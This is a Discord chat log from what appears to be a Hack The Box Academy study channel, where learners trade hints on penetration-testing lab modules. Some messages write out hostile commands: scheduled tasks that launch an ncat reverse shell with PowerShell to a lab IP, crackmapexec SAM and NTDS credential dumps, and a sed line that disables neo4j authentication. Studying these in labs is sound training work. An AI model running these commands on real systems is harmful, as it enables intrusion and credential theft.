#modules
i dont use anything else than vim
because it doesn't
-vvv
-vvv
You don't need sudo
you were supposed to add that 😄
What part made it work?
removing the sudo obviously
ask htb staff about that
@surreal rain
as far as i know there are (were?) some issues with payment processing recently but i don't know any of the details
anyway, if you're here for learning stuff, you can try some box 😄 i can offer myself to help for a bit
Oh lol I forgot to chmod, ssh freaked out
guess they don't want me to lose my key
oh but it seems that I changed the permissions to too low an amount
that's why i told you to use -vvv
Don't be tagging the admins
Has anyone completely finished the Password Attacks module that could help with this? I have been stuck here for ages.
ok so
but really, work on your attitude. I'm trying to help you, i'm not trying to offend you or so. If you're just stupidly running random commands and pasting screenshots here to get help without really understanding what's happening or even trying to understand/research it on your own first, you're not getting pretty much anything from the academy.
that's my point - it's asking you for a password. SSH key is something totally different than a password
look for the answers yourself first, thats key
Alright
if you're expecting to get answers from somebody else, you won't really get anywhere in life at least from my experience. Ppl don't really hand out money for free in most cases
^
There won't always be someone to give you the answers and when push comes to shove, if you always rely on getting answers from other people you'll get nowhere
if you'd run that without -vvv you should get a warning about incorrect perms on the key anyway, check the output of the command again
Don't give me hints lol, I'll try figuring it out myself
Command Injection Filter Evasion challenges fail to stay up when trying to spawn.
log out and login isn't working
with that module that Doxxel is on, a LOT of the info is in the module i'd suggest looking at your notes first for that
please guys
staff no response, and i could chat to staff in the bubble chat on the htb website, i don't know why
bruh just wait for a response from support
If you could chat to staff via the green bubble then you're all good.
been told a thousand times
as f0x said, wait. Asking here will not make your ticket be any quicker.
most companies be like "you'll get a response in 2-3 business days"
It's rather pointless asking here tbh if it is payment related
let me ask you guys , is there here using paypal or now for subscription?
in htb academy
If you see no option for paypal then there is no option for paypal.
What HTB provides is what is accepted
in my country there isn't credit card, just debit
that suffer to subscription, is there any solution?
contact customer support (billing to be more specific)
email please
create a ticket and ask for billing support
where to do it?
Need to speak to a person? Learn how to reach our support via the Main Platform.
hopefully there's more patience once they can access academy stuff; because hoo boy do the academy modules require some patience
i didn't get the hackernoob role
how could i get it, because i could send screenshot proof here
@naive sky For any further questions or issues, please create a thread via #1024429874246590575. Let's have this channel on topic please.
Verify your htb account in #bot-commands using ++verify
Is nosqli assessment 2 javascript injection?
idk have you tried JS injection?
has anybody done the proxy module on htb?
I'm at the proxying tools section but nothing seems to work like it should, has anyone encountered similar technical problems?
Can anyone point me in the right direction for the Attacking GitLab username question? The script on exploit-db didn't work for me so I wrote my own, it finds the usernames in the example so it works but what username list do I need to use? I tried all in the seclist usernames folder except the xato lists as the box times out before it finishes the list.
Hope my Q was ok?!
Your q was fine I was more responding to the person that just said "hello I need help" kinda vague
I haven't done the module you're on so can't help ya there
Pretty sure they work UK time, you messaged this at 4:30am.
Hi all, doing the AD module and trying to run Wireshark after xfreerdp-ing into the provided Linux box. When I run it without admin privileges, it, of course, does not work, but the application at least starts. When running with sudo, I get an error: "Main Warn could not connect to display :10.0". Seems like an issue with X... Could anyone help?
Which section?
Hey can someone tell me what's the neo4j default password in the pwnbox machine? I can't login with "neo4j:neo4j"
the neo4j on the pwnbox still has an authentication issue, so first if neo4j is already running stop it and run this, after that you should be able to login
sudo sed -i 's/#dbms.security.auth_enabled=false/dbms.security.auth_enabled=false/' /etc/neo4j/neo4j.conf
which section?
i can't remember (i think it's because of some stupid character or something) but the script on exploit-db doesn't work, use 49821.sh from searchsploit. for the username wordlist you just have to guess, if you need a hint on that shoot me a dm, or you can just use cat to output all username wordlists in seclist into a file and use that, it would still be fairly fast
The password for the neo4j service in the pwnbox is "htb"
oh wait so that's the issue??
Got some help from @vital tree and now resolved.
nice
i was doing the same thing before and i swear i did see some staff agree this is an issue and even pin it somewhere
It's an issue bcs we don't know the password for the neo4j service. I asked the technical support for it
oh wait a sec so i think they fix the authentication issue thing
because before if you login with any cred neo4j will give you some auth error or some thing
Hi guys, could anyone please help me out?
Stuck at AD Enumeration & Attacks - Skills Assessment part I.
I need to get to the MS01 machine, have got credentials for svc_sql which is (sql)admin on SQL01. The 2 ways they show in the course to pivot to SQL01 are not working for me.
Any advice anyone? Thanks
oh yep i just tried, they seem to have fixed it because the error is gone now
you can just ||rdp in|| 🤣
No way lol 😄
leaving because ping @tidal sonnet
Do I need to setup proxychains etc? Having a bit of trouble with this lab setup since I can't reach a certain part of the lab from kali, thinking port forwarding is kinda out of scope for this module
yep. i think i use autoroute on the web target machine
hey everyone, should I use the pws.list from Resources for the mssqlsvc password recovery ATTACKING COMMON SERVICES. The hash capture's impossible as IMPERSONATE is not authd with htbdbuser?? ! SOLVED through xp_dirtree hash steal 😐 am such a noob lolll
WINDOWS PRIVILEGE ESCALATION // Pillaging : is there something wrong with the SAM, SYSTEM, SECURITY files? i have tried using secretsdump.py on different machines and there is always a problem
Hello there I am currently doing Footprinting module with IPMI category, the question that I have to answer is
What is the account's cleartext password?
Now I got the hash and i am using the command
hashcat -m 7300 -O f0c30fba82140000603501e57454b97efe0520edb6529bf9d39cbf36a58500fc440912c3689ecf1ea123456789abcdefa123456789abcdef140561646d696e:8dc9a84533290d7d8e8d587953b6a9203e0b4b50 -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
but it says its around 1day to finish. While that might be the case sometimes, I feel that for the purpose of the lecture, i did something wrong 😛
Any help would be appreciated
@devout torrent what about using john
hint those files could be ||fake|| because htb is evil and hint check all ||backup||
oh wow that's evil yes. I also saw someone in a forum page mentioning they got the hash this way. Very confusing. Thank you for reorienting me
Hello, good day.
Please what's "RnD".
Saw it in the announcement.
Invest in RnD...
research and development
Ohhh okay
Thanks.
++
Why did the announcement get so many angry emojis? It's good news no?
Hmm still stuck, port forwarding does not seem to work, feeling clueless now and throwing in the towel 😦
There are no writeups for the academy modules i assume?
Which module are you on?
12:33 posted and got answer, but still not working (couple comments above here in this chat)
I used pivoting heavily in those skills assessments
It makes the whole thing much much easier
For the bit you're up to you'll prolly wanna set up a socks proxy and then proxychains rdp
Tried through ssh but cannot reach kali ssh
Your kali machine can access 1 machine in the target network. You need to pivot through that machine
(Revisit your notes from the pivoting module. It'll be helpful I promise)
Always having trouble with port forwarding stuff tbh
I didn't do any port forwarding until the second skills assessment
I think I used chisel on the first one
Unless you have ssh access to the first machine. Then I would have used sshuttle
Thanks I will look into it now, hope it works 😄
Just remember that you can't send ICMP packets over most pivots (so you can't confirm it works by trying to ping the other machines)
Hi, I have completed all modules in NETWORK ENUMERATION WITH NMAP except one where I cannot find the solution for NETWORK ENUMERATION WITH NMAP-->Service Enumeration. I'm quite sure that Nmap & tcpdump are to be used, but tcpdump does not show the flag
could someone hit me in the right direction please?
Initial enumeration
Hello! I need help with the FOOTPRINTING module, the section IMAP/POP3. I can't answer the first and the last question! please help 🙂
Have you run nmap <IP> -sC?
read through the output carefully, that should give you no.1
sudo nmap -sC -sV -Pn -n --disable-arp-ping -p110,143,993,995 <IP>
oooh man I tried that but forgot the last 3 letters "ltd"
thanks I got the first one
That is a UK convention for company names "Limited" as in Limited Liability.
I also can't see the admin email address
anyone able to help with Attacking FTP of Attacking Common Services. Feel like this should be straightforward but am not getting anywhere with it. Have bruteforced with the usernames/wordlists with no results.
Have a read through the section again. Have you connected to the IMAP service? You want to read the email, and view its associated data, to get the flag and the admin email
Hi all, doing the AD module (Initial Enumeration Section) and trying to run Wireshark after xfreerdp-ing into the provided Linux box. When I run it without admin privileges, it, of course, does not work, but the application at least starts. When running with sudo, I get an error: "Main Warn could not connect to display :10.0". Seems like an issue with X... Could anyone help?
Hello guys, I'm struggling a bit on Finding & Filtering Content (INTRODUCTION TO WINDOWS COMMAND LINE). So the 1st question and 3rd question I cannot get (understand) or just cannot type the correct answer....I am on it for the past 3 hours and looked everywhere for hints..... So the 1st question is "
Hint: The 'Method' of which an object functions defines it.
and the 3rd one is:
Hint: We are looking recursively.
I just tried all possible ways to find out, I read everything a few times again and again and still nothing came up 🤯
Also I checked the source code if I can get the answer but nothing 😄
Please give me some advice probably is super easy but cannot get it... Thanks
Try a different rdp program?
You can use tcpdump and output to a pcap file. Then transfer that to your attack machine and analyze it with wireshark
Tried both rdesktop and xfreerdp, with the same result.
Indeed, tcpdump and import to WS is a workaround, but still I'd like to know why WS doesn't run with sudo and how to resolve the underlying issue.
Changing the password for root and logging in via remote desktop directly as root helped as well.
hi guys, I'm a newbie and rn at the tier 1 "funnel" mission, there is a goal with SSH forward remote tunneling and i got some problem...
i created port 1234 on the server under the "christine" account, then started listening to it from my host and connected to the psql database, but the terminal ignores all my typed inputs for listing dbs like \l, with big yellow words END in the terminal...
anybody can u please help me with that
nahh im good
idk why but my interaction input with the console is a little bit different from tuts but i did it
Module: Network Enumeration with Nmap
Section: Service Enumeration
I am trying to answer the question " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.". To find the flag I have tried to use tcpdump and nc. But I cannot capture any packets.
└──╼ [★]$ sudo tcpdump -i eth0 host 10.10.14.245 and 10.129.50.121 -v
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C
0 packets captured
3 packets received by filter
0 packets dropped by kernel
If nmap alone is the key then which option do I need? -p- -sV ? but that does not show everything ... -sA did not help either
Use nmap
again, is anyone able to offer any tips for the Attacking Email Services. Brute forcing is painfully slow for me over the VPN and I haven't got any hits from the password list with the user I've found(and I'm using the full email address for this user in hydra - i.e. user@inlanefreight.htb)
just restarted the box and now it works.... great.
guys i have doubts in the password attacks module, pass the ticket in linux. will anyone help me? if yes then dm me, i need live help
i will share my screen
Hi all, I'm on the pen tester route and I'm doing the SMB shares but the information that is on the lesson page is not the same information I'm getting back even though I'm using the same command
Module: Password Attacks
Section:Credential Hunting in Linux
Guys, the objective isn't to look for credentials once you are in the host?
My dumb ass is here, brute-forcing this smb with a user cme found, but with no luck.
The HINT says ||there is user Kira with the password LoveYou1 for SSH||, but it does not work in reality. Nor any mutation of the suggested pwd. Do you have any leads i could start to go on?
Thank you!
@proper pagoda mutate that password
opt/vpnbash.sh: no such file
bash: /opt/vpnbash.sh: no such file when i run curl -s http://138.68.183.154:31036/ -X POST -d "/serial.php"
how do i fix this?
no it works check mutations again
Hi
allo
I'm a guy that wants to learn how to hack, is this discord server to learn or for pros?
I am not sure, myself.
no
yes this is a discord for everyone
ok
kali linux is a collection of tools used by hackers.
but it's preferred?
hey
the pwnbox on the site is parrotOS and not Kali Linux so you don't have to use it
You can use any OS.
if anybody is good with bash scripts, can you dm me?
even then, parrotOS is kinda eh
Yes, but install Linux on VM too.
and I would just use tiny linux with docker plus cloudflare-warp
but its a different operating system
linux
@flint depot tRUE
however. Under the hood, they are the same at the assembly level. They're just doing the same calculator arithmetic how they're designed and programmed to
no. it will if you install over the entire partition
coz that's how I know what will happen, maybe im wrong
Should I just get a new pc and download linux there?
No, Install Linux on VM.
qemu is a good one if you're looking for thin-client plus kvm
Download VMWare Workstation or Virtual Box
I already have virtual box downloaded
dude, those are bloated.....
use qemu or docker at that point.....
or mount a spreadsheet as a filesystem
but I already have virtual box
and it is already outdated....
use qemu if you need something that uses less disk space
ok
You're also welcome.
This is getting off topic: #1024429874246590575 or #general is the better place for these convos; if you can't access them then you need to verify your HTB account in #bot-commands using the ++verify command
Hi team, I am stuck with this module - https://academy.hackthebox.com/module/77/section/726 - List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
I tried many different common passwords, even using a specific list of commonly used passwords for SMB, but still, no luck. Any hints?
[★]$ smbclient -U bob '\\10.129.42.254\users'
Enter WORKGROUP\bob's password:
session setup failed: NT_STATUS_LOGON_FAILURE
for the attacking common services > FTP section. Is there a way to not make medusa so slow? I'm getting one request every 5 seconds and my password list has 14344391 entries.
Don't use Medusa 😅
I don't remember how I did that part but bob likes weak passwords
Yeah, i tried like 30 different passwords from most common password lists.. even specific lists for smb
Be a student lol
Hello, all. I may have found something that applies to most linux and linux like shells.
The ancat.github.io creator made a valuable point.
But, I am curious. If someone dependency injects over existing functions at runtime, how prone is everyone that has an ssh-server?
https://discord.com/channels/473760315293696010/1062240072092635206
https://ancat.github.io/python/2019/01/01/python-ptrace.html
seems like an interesting question but I dont see how its relevant for the modules channel. This isnt a general talk.
Fair. Does hack-the-box have said channel?
i've been messing around with hydra now, and i keep getting [ERROR] all children were disabled due to too many connection errors. EDIT i may have figured it out, it was the -S flag.
thank you.
Hi everyone, happy new year! I’m just after some advice. I’ve been learning ethical hacking since October 2022, I’m comfortable with recon but I need to nail my exploiting. I can get so far in a box and get stuck… at this point in time do I then look at the walk through and rinse and repeat? What’s the best way of learning from your experiences on HTB?
Work on academy modules, practice on boxes, take good notes, set goals.
Okay, I’ll keep chipping away at it. I’ve taken many many many notes. I’ll go through the new multiverse and see if that helps
try to turn your notes of individual boxes into a general set of notes, like hacktricks. Develop a set of routines that you will do to enumerate the box and be familiar with what tools you will need depending on what you find.
Perfect, thank you!
im working on the windows command line module, the scheduled tasks section. I want to change the code to send a shell every minute
schtasks /create /sc MINUTE /mo 1 /tn "RevShell" /tr "C:\Users\htb-student\nc.exe 10.10.x.x 6969"
i have this code and its not working. The command will connect to the listener manually but not for the task. Anyone have any ideas?
when i try NOSQLi in the assessment 2 of the NOSQLi module, it does not receive a username, does it look like it's sanitised?
Nobody knows what help you need, so nobody knows if they are able to help you.
Post your question here.
sounds like a question for google
for the love of god this channel is for hackthebox academy modules
Module: Active Directory Enumeration & Attacks
Section: AD Enumeration & Attacks - Skills Assessment Part II
Question: May I dm someone for a nudge for question “locate a configuration file containing an MSSQL connection string. What is the password for the user listed in the file?” to avoid spoilers?
Attempts: I’ve attempted to utilize smbclient and cme to recurse readable shares found with credentials on question 1&2 and 4&5 but can’t find/read the MSSQL connection string.
I am working on the DNS Footprinting Module (https://academy.hackthebox.com/module/112/section/1069) It seems like my target, not the pwnBox hangs after a while. I was wondering if you guys could go through the module to make sure it can be finished. It could also be that I am a noob.
so this seems to have worked for me
schtasks /create /sc MINUTE /tn "sus" /tr "C:\Users\htb-student\ncat.exe 10.10.15.77 69 -e powershell"
the modifiers or /mt default is 1 so you don't need to put it in but the rest is looking right except you need the -e tag for a rev shell if you are using ncat
my note on that module is terrible but offshore been F ing me in my ass so i haven't got time to fix it yet but sure shoot me a dm also you don't need to put your question in that format
if you are working on the last question which needed brute force, then if it is taking too long try a different wordlist. also hint: you will need to brute force a ||subdomain||
Thank you! Will dm shortly
All are able to be completed (with the right word list)
In the portion where you're connecting locally are you putting your machine IP in? Or leaving it as the .x.x
he's ranked pro hacker 🤣
yep i'm definitely going to try that at least this year
dont bully light greenies in chat 😦
UNRELATED but can I send both yall a DM real quick?
me? sure
anyone else experiencing issues with the spawned hosts?
i refreshed 4 times already and none of them seem to answer.
yes i cant run assessment 1 in NOSQLi for 3 days
in NOSQLi, how can i break out of this sanitization?
sure
Depends on the type of system/attack expected, sometimes they can't be pinged
ping works, it's supposed to be a web challenge but no webserver seems to run
¯\_(ツ)_/¯
talking to the support now
It also helps to know which module so we can check and see
Or hit you with that sticker ^
I'm a nab and the webserver is running on a non standard port and I just skimmed over that
time to sleep I guess
-.-
if you still need help feel free to shoot me a dm
omg thats awesome
can someone with a kali machine try to run pypykatz? I try it on my machine and keep getting module errors even though I checked if the module was installed
i hate pypykatz. It's missed things on more than one occasion for me. I'd rather boot up a windows vm, transfer the files there and use the actual mimikatz
so since most of us have spent quite some time here together and sometimes we really make stupid mistakes... and because this one has been the funniest one I have ever made, I wanted to share it with you: I spent like 20 mins trying to transfer a file using an ip with this format 10:10:15:170..... no more off topic from my side but I really wanted to share this piece of art which I can't stop laughing at myself about..... HAPPY LEARNING!
🙂
thx @vital adder !!!
🤣 i needed that laugh
Hmm I don't see the problem, looks normal to me
😄
Yep normal to me lol
I can imagine someone creating a script to interpret ':' as '.' and basically swap them
True
Iirc there was a challenge box somewhere that removed spaces
Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key? struggling a bit with this question on javascript deobfuscation
which section are you on?
skills assessment
curl -s http:/SERVER_IP:PORT/ -X POST tried this command but it says command not found
so you should be on question 6? hint: after decoding the code try to make out a ||web directory|| and a request type, after that, just like the question said, try to replicate it
almost right
what's wrong with the command?
hint it's missing something
or go back to the Deobfuscation section and try the given site
Has anyone seen the movie jolt
aight, thanks for the help 😄
There's this awesome setup this chick has, I wanna be that good
ill check it out tonight
So where do you go to know the method of getting into the file after nmap
And does anyone know what to do after nmap says that it has ignored ping
If your question is not related to a specific question of a section or module of HTB academy try doing modules and/or do research and you will find the answers you’re looking for
Thank you, i will try that when i get back on
😂 ya x.x was the rest of my ip
Yeah lol I figured, but some days you just have those moments you know
I need help with the Skills Assessment - Easy section of the Password Attacks module. I have tried everything to get a foothold, brute forcing ssh and ftp with the users I found using the userenum msfconsole. I tried mutated password lists, and I just cannot seem to get any way into the host.
dm me
.
How about ya fuck off
@vital adder its so odd
its there, hasnt run but is scheduled,
looool
Are you laughing BC rm -rf?
btw part of the reason I asked so many questions on this is because the machine was broken
the boxes are rarely broken
didn't need a vpn + the box was broken
I am able to add an Admin user with PrintNightmare. I ran CVE-2020-0668 with an admin user and I was able to get a shell with this user. I am still getting meterpreter timeouts....
yo 🙂
so a command exec payload works fine? what kind of timeouts exactly - using session to the new user or while using the exploit?
@raven cairn
the added user was obviously meant to be admin so you'd root the box
one sec
Is there an SU equivalent in windows?
i'm not sure how familiar you are with these tools
yeah, runas
you can do runas /user:someone cmd.exe or so
I'm familiar with a lot of the CPTS material (I am 90% done) but my windows skills aren't good tbh
no clue what CPTS is 😄
It's the pentesting cert for Hackthebox
oh ok, my point was if you have local admin, you can most likely run commands over smb, winrm, rdp or so
and pwn the box that way as runas can be problematic at times
so it's probably better to try something else first and keep the runas kind of like the last resort thing
sooo? 😄
👀
😆
AAAAAAAAAAA
BBB?
So if i understand correctly, I am supposed to run rdp with the hacker user I created?????
Like I'm lost
My brain no work
smb/winrm/rdp
most likely something like crackmapexec -u user -p password --sam 1.2.3.4 should be fine to pwn the server
if that's dc then something like crackmapexec -u user -p password --ntds --drsuapi 1.2.3.4 or so
@high sentinel got it. Thank you very much
holy shit i am stupid 🤣
I am not good with instructions haha
Much much easier than I thought
literally just needed to rdp as local admin🤦♀️
Mood
No one is more stupid than me. 🙂 Much love bro
hello where is the newbie chatbox?
Hi there, there's a #general chat and much more if you verify
it's in #welcome
Hey, asking here since this one is really active compared to others, but does anyone here know how to fix hashcat issues? I've manually reinstalled it according to their guide and it's still giving me the shared.cl error
ask in a more accurate channel, this one is for module discussion. Activity levels are irrelevant, post in the correct spaces.
Gotcha, which channel would be best for that question?
not really a tech support server so not sure. Can ask in general but good luck getting an answer. Could try posting in community help too
I did ask in starting point, because it's from that lab area, but nobody there knew how to fix it
sometimes it be like that
it do be like that ¯\_(ツ)_/¯
Can anyone help me with SQLMap Skills assessment? I found the attack vector but I'm struggling to move forward
Any hints on the second question of https://academy.hackthebox.com/module/77/section/844 ?
Linux priv escalation - "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'."
I got from user1 to user2, but I'm stuck on what to do to get root access
What have you tried
chmod bin/bash, and /root/
operation not permitted
I can see the /root directory permissions is root/user2
The second one is for user2 group, right?
Tried find /root -writable 2>/dev/null to see if there's something writable within the folder, nothing
Need to go over some more of the initial basics. review the appropriate section from the module again.
Check the root directory. The module talks about what specifically you can look for
there's a couple of "go-to checks" that you haven't done.
Yeap, and the flag, I just don't have permissions to read it and I don't know what to do to escalate from user2 to root
What else can you see
/root directory has group permissions set to user2. This means that any user that is a member of the user2 group can read and execute files within the /root directory, but cannot write to or modify the files in that directory.
Yes
I thought I could be able to see the content of the files, but not modify or delete them
Yes you can see
But flag.txt is root root
The module talks about how to look for things
And what thing you might be interested in
i'm in the middle of doing some stuff right now but sure shoot me a dm if you still need help
Hi all
may anybody please assist me with the imap command which is in the footprinting module, in the imap/pop3 section.. i'm stuck on the last two questions.
even though i know where to find the last question, the commands show syntax errors on the fetch or examine command. Please help me.
Thanks
give this a try #modules message
SSH keys?
Bingo
certainly something worth checking
Copied the priv key, created a id_rsa file on my own machine and used it to connect to SSH
root@gettingstartedprivesc-691403-59df5b9657-28z4k:~# whoami
root
🙂
tks
<3 happy hacking
Thanks for sharing the link @vital adder. but that's the problem, those commands are not working. i don't understand why. i put the same commands but it shows syntax errors.
@ivory hollow I'm trying to guess where you might be (in the IMAP thing). Make sure to include 1<space> before each command. The character "one"
||1 SELECT "DEV.DEPARTEMENT.INT"||
let me check my notes real quick
i try
this was not working when using 1 in front of select. it shows command not found.
There has to be quotes around it
i dm you @raw elbow
I believe so
hmmm just tried and both fetch and FETCH seem to work
yeah it's not case sensitive (IMAPS).
ah, right. ok. I understand the question now. but, dev.department.int doesnt exist, where DEV.DEPARTMENT.INT does.
ahhhh
makes sense, the values are case-sensitive but the commands aren't
yeah you're right.
**Module:** Password Attacks
**Section:** Password Mutations
**Issue Summary:** My generated wordlist for brute forcing SSH is 187k+ lines and is taking too long to process.
Attempted Solutions: cut the first 17k lines of the mut_password.list as suggested in previous discord threads.
Any suggestions to reduce the volume of passwords to use in the SSH brute force would be greatly appreciated.
has anybody ever had this issue when using hashcat? "Host memory required for this attack: 0 MB"
no but adding the -O flag fixes most hashcat errors
still didn't work 😦
Can you show a screenshot of the error message?
9aa2a870d0001ea6569ec7ab579bd409
can you try and crack this using rockyou.txt
its a md5 hash
You're positive it's md5?
hashcat doesn't show any errors, it just says it exhausted
yeah i made the hash
to test if it would work
If hashcat says exhausted then the password isn't in rockyou.txt
it is tho :/
i took the password "iloveyou"
and hashed it
iloveyou is the first word in the list
maybe im losing it
and doing something terribly wrong lmao
i'm 99% sure you didn't hash it properly
perhaps not 😦
check dms please
Anyone have a nudge for the last question of Footprinting - mySQL? I have found the email for the customer in the question but i'm getting an error. I'm showing all of the customers with their information in front of me, so I'm kind of confused.
DM me what you got, I just revisited that section or a screenshot of what you're meaning
Finally finished CPTS AND CBBH Path, time to prepare for the exam!!!
Resolved, pesky space elves
blarrrrg
Im about to get off for the night. but i'm stuck on attacking common services easy lab.
I found creds... I found the two files that gave me a clue where to go next and I'm pretty sure i know the payload to send. I'm just having a hard time coming to this conclusion. Would someone with good notes DM me? I could use some help explaining this.
I'm also stuck on this. I use the keys daily, but the module won't accept my input 😦
If anyone is available to chat about the "Using CrackMapExec" Skills Assessment I'd appreciate it.
To anyone who's taken the cpts exam, do you recommend taking some time to study and practice on active/retired machines after finishing all of the modules? My plan is to just take the exam asap while the material is still fresh in my mind
is the reason a macOS fundamentals section was added because its being planned to add more stuff related to hacking macOS?
I just wanted to ask
lol
that could be an entire learning path
or am I just not getting it?
I was gonna try to do everything in general but that seems a little like "ok why would I do that?" but I'm torn between that and just finishing InfoSec fundamentals and getting into job-role paths
thus far my goals has mainly been to complete both job-role paths by the end of this year (I started with InfoSec fundamentals this past Fall late in semester)
@quasi wave I was in depression, I was unable to get a flag for 2 days, I was trying to post my problem and you are spamming here
and making fun of my name
bro i was kidding
😆
ok lol
no I am literally doing the InfoSec fundamentals module
I'm more than 60% of way through
63% approximately
so ya
sigh
@dawn wing @cunning drum Please keep this channel on topic
Okay
@novel matrix sorry
Is it actually possible to do the footprint easy lab without reading the hint
I'm having no luck brute-forcing SMB in the Attacking Common Services module, using both the provided and discovered password lists. Has anyone finished that section that could provide some insight?
HTB Academy -> Module: File Inclusion -> section : Php filter
I tried by Source Code Disclosure (convert-base64) , curl , nothing happen any guidance
idk, how bout following basic toolset path on HTB Academy
Also im stuck on active subdomain enumeration section from information gathering - web edition module can someone help xD
For apps for hacking
Or Hacking apps
Hacking apps*
erm
yes, the second one about " Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer."
Is tht the module name
Ohhk
hola ?
In section nmap "module/19/section/103" there is a question asking for a flag by checking on services, i got the flag but it says wrong answer? any fixes or get arounds ? Service enumeration section
Did you accidentally copy extra whitespace?
Did you figure it out? Feel free to DM me, if you want me to verify that you have the right one.
No. Please read the rules
Hello, I'm having trouble with this question from the INFORMATION GATHERING - WEB EDITION:
Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer
nslook commands seem to not be able to reach the domain
Maybe try respawning the target. Are you using VPN to connect to the HTB server?
I'm using the pwnboxes from the platform
i was stuck at password attacks Protected Files
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
i was trying to brute ftp and ssh am i doing correct
@past tundra The https://hackertarget.com/zone-transfer doesn't seem to be able to reach the domain either.
pm with screenshot please
OKEY, AT IT
@vital adder would you mind if I do you?
sure
The footprint lab boxes are a beast to do ❤️
Hello , I’d like to know how I can change the email address of my current account because of I want to put my student one instead of my personal address
hey, I read in the practice section of cpts that at the end of each module, there will be number of suggested retired machines, I tried to find them but I could not, can anyone help?
I'm trying to post something here but the bot keeps deleting it
can someone teach me mobile hacking
is there a wget command for windows cmd line or can i only use PS for downloads
is anyone having trouble spawning module targets?
I am doing Skill Assessment 1 of Windows Privilege Escalation. I have to find: confidential.txt I have tried with tools to find this file, also with ||findstr /spin "confidential.txt"|| but I am not able to locate this file, can someone provide me a nudge?
Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number). struggling a lot with this one
@agile spire @solid python sorry for tagging, but need expert help
Yea, I'm having issues. I see someone else has mentioned it in #cpts
In the Attacking Passwords - Pass the Hash module, why would logins for other computers be stored in the memory of the MS01 computer?
I think I have misunderstood something somewhere.
I've found the hashes with mimikatz, I just don't understand why they'd be there.
You should Learn About Active Directory
Google it tbh
I found it in Google in like a few seconds
Hey, I want to ask something, if I don't go to college majoring in cyber security, can I work in cyber security?
Yeah
If you have the right certifications
College degree just means you made a time committed effort to learn
Ahhh, so what certificate must be prepared if I want to become a red teamer (pentester)? I see a lot on YouTube and it confuses me😭😭😭
A certification is a document given by a registered company that is proof that you have the knowledge of a subject.
I.E. CompTIA A+, Network+, Security+... Or OSCP, or the htb CPTS
And a lot of times a certification can substitute as work experience
Ah, thank you🤣😭 @fathom pendant
This channel is for asking questions regarding modules found on http://academy.hackthebox.com and to get your name colored you need to verify in #bot-commands and you will see more channels
They aren't logins for another computer. They're user logins. Those users happen to have logged in to MS01. Once you grab their creds you can use them to log in to any other machine on the domain the said user can log in to
Okay, so that makes sense. But in the MimiKatz output, what is the meaning of Logon Server:
```
Authentication Id : 0 ; 445139 (00000000:0006cad3)
Session           : Service from 0
User Name         : julio
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 1/12/2023 8:18:32 AM
SID               : S-1-5-21-3325992272-2815718403-617452758-1106
```
Thank you
In an AD domain, logins aren't validated by the computer. They're validated by the domain controller
In large domains there can be more than one DC, so the DC that validated the login is stored as well
Oh yeah!
got it. thank you so much
Np
Hello, good day.
I was wondering, there's the CPTS and CBBH paths with modules (I haven't gone through either of them in depth),
1. Why exactly would I choose CBBH over CPTS? I'm seriously curious, are the modules similar in both paths or is there more that makes one a CBBH and more that makes one a CPTS? Also,
2. Since CPTS can engage in CBBH activities and vice versa, what's the diamond in the dirt?
I'd like to know so I can choose perfectly based on my goals and personality.
I understand that a bounty hunter's main goal is to find bugs and squash them but a pentester doesn't actually set out to look for them, or am I not getting the concept properly?
I'd like some enlightenment, thank you.
Bug bounty hunter is all about service application exploiting, penetration tester is about taking the exploits and gaining access deeper into the system
Which is why there's overlap
Kinda hard not to dip into bug bounties when doing penetration testing
Bug bounty is fundamentally different than pentesting in the fact that you'll be looking very very deeply into webapps mostly. Yes there is some overlap but the two roles are completely different. Pentesting aims to fully compromise a network where bug bounty aims to compromise an application
^
Thanks @fathom pendant and @graceful rampart .
I just worked this out today after being around for 11 months! 🥺
hey I am doing Buffer overflow on linux x86, Identification of Bad Characters, I have a question on how to generate the next set of CHARS after I find bad characters. Can someone help me out?
Can I ask, does the footprinting hard machine start blocking scans after a while? Like I can nmap without -Pn at the start but can't after I want to try some different script
The hard one is a pain, the real meat and potatoes of it though is look at the types of servers it's telling you it is. And go from there
That one iirc can be done without even thinking about nmap
The hard one is removing my will to live, I’ll be honest 😄
❗ just want to bring this to the attention of the mods... the timer for the target has a glitch ... It is running faster than normal (i.e. 1 min is less than 60 sec). How did I find out? well I am keeping the timer on my phone as well and it showed 2 min elapsed but HTB shows 10 min instead.
hey
Yes. Thats a well known bug
so does that affect the target lifespan as in I can ignore it?
Ignore it
If the time says 90 min when you reset the box, it'll be up for 90 minutes regardless of how fast the time runs out
Ha I didn't think braa backup:ip is an option I can use, I just used braa ip
Skills Assessment - WordPress
The server is so slow, that the reverse shell fails everytime. Does anyone know how to fix or bypass this?
I am using the reverse shell from msfconsole unix/webapp/wp_admin_shell_upload
Yeah the syntax isn't really given to you as braa <community_string>:<IP>
Hey everyone, I was wondering if I can get a nudge/DM someone regarding the following:
AD Enumeration & Attacks - Skills Assessment Part II, I'm on the question:
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I have an open xp_commandshell and logged into the database.
Remember that not everything has to be an AD specific attack. You have command execution on a windows machine. Your goal should be the same as on any other windows machine
Thank you! I will enumerate different directories using “dir” and see what I can find.
Dont forget to enumerate all the other things you normally would after landing on a non domain joined windows machine
hey which module are you in rn?
I finished AD 2 days ago and then took a break yesterday cuz my brain was fried from doing the 2 assessments back to back. Booting up my VM to start the next module now
i skipped password attacks for now as it was kinda frustrating, now Attacking Common Services is buggy and more frustrating
As frustrating as they may be, they are all doable
frustration is very common when working on these things
get used to it
you wont be able to just skip parts of the exam
nah i skipped password attacks to do later
The password attacks labs are really fun
the PtH and PtT sections are important for when you do AD
would not advise skipping that module
Understood. Will do. Thanks!
alr thanks for your suggestion, approx how many days did it need you to complete password attacks and Attacking Common Services
